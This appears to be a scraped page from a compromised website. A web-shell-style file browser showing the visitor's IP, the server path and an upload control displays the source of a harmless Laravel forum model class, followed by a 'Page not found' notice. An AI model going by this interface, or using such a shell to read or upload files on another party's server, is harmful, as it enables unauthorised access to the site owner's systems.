????

Your IP : 18.189.192.24


Current Path : /home/thenclexdoctor.com/public_html/app/Models/
Upload File :
Current File : /home/thenclexdoctor.com/public_html/app/Models/ForumFeaturedTopic.php

<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Model;

class ForumFeaturedTopic extends Model
{
    protected $table = 'forum_featured_topics';
    public $timestamps = false;
    protected $dateFormat = 'U';
    protected $guarded = ['id'];


    public function topic()
    {
        return $this->belongsTo('App\Models\ForumTopic', 'topic_id', 'id');
    }
}

Page not found | The NCLEX Doctor

Page not found!

Sorry, this page is not available...